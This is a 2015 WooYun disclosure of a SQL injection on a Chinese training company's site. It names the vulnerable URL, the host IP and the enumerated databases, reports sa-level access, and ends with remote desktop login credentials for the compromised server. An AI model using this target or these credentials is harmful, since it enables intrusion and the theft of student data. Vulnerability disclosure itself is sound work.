当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-094022

漏洞标题:华浦教育培训机构某处一枚sql注入导致至少5W多学员详细信息泄露and服务器和多站沦陷

相关厂商:华浦教育

漏洞作者: 雅柏菲卡

提交时间:2015-01-26 18:57

修复时间:2015-03-12 18:58

公开时间:2015-03-12 18:58

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-26: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-03-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

..............

详细说明:

..........

漏洞证明:

Target: 		http://www.huapu.org/searchclass.asp?Submit=1&kechengid=1&sitename=1&typeid=1
Host IP:		222.73.57.124
Web Server: 	Microsoft-IIS/6.0
Powered-by: 	ASP.NET
DB Server: 	MSSQL 2005 with error
Current DB: 	classorder
		tempdb
		model
		msdb
		pubs
		Northwind
		chat
		elite_stu_else
		mars_stu_teach
		elitenews
		kidstownnews
		elitegame
		english0917
		kingjp2010
		51winjob2010
		classorder
		guest_bookat06041213
		mars_Stu_Sz
		Elite_stu_teach
		chat_s1
		kids_stu_teach
以上是从胡萝卜上弄出来的部分数据  先不急 
我们让可爱的 萌萌哒的穿山甲去看看这个权限是多少
QQ截图20150126153524.jpg



  居然是sa
而且权限蛮大的
classorder
		tempdb
		model
		msdb
		pubs
		Northwind
		chat
		elite_stu_else
		mars_stu_teach
		elitenews
		kidstownnews
		elitegame
		english0917
		kingjp2010
		51winjob2010
		classorder
		guest_bookat06041213
		mars_Stu_Sz
		Elite_stu_teach
		chat_s1
		kids_stu_teach
这些数据库里的学员信息至少有5W 这里就不体现了 为了保护学员的隐私
通过查端口的一系列的命令  (乌云的人都知道  )
得知远程桌面的端口是 1987
远程桌面 www.huapu.org:1987
用户名:123123
密码:123123.pp



QQ截图20150126154158.jpg







QQ截图20150126154238.jpg

修复方案:

............

版权声明:转载请注明来源 雅柏菲卡@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝